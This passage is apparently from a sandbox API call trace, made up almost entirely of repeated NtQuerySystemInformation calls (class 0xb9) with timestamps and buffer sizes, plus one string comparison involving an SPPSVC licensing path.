(SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x20, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x20, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c8, Length=0x50, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x38, ResultLength=0x0) [0227.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x28, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x38, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x28, ResultLength=0x0) [0227.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x28, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x38, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x20, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x20, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x20, ResultLength=0x0) [0227.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedf0, Length=0x20, ResultLength=0x0) [0227.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x38, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x20, ResultLength=0x0) [0228.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x20, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x20, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef70, Length=0x50, ResultLength=0x0) [0228.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x38, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x38, ResultLength=0x0) [0228.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0228.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x28, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x38, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x20, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x20, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x20, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x38, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x20, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.128] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef58, Length=0x50, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x38, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x28, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x38, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x38, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x38, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x20, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x20, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x50, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x50, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x50, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x50, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x50, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x38, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea10, Length=0x28, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea10, Length=0x28, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea10, Length=0x28, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea10, Length=0x28, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x28, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x38, ResultLength=0x0) [0228.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb00, Length=0x28, ResultLength=0x0) [0228.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb00, Length=0x28, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9a0, Length=0x20, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.153] 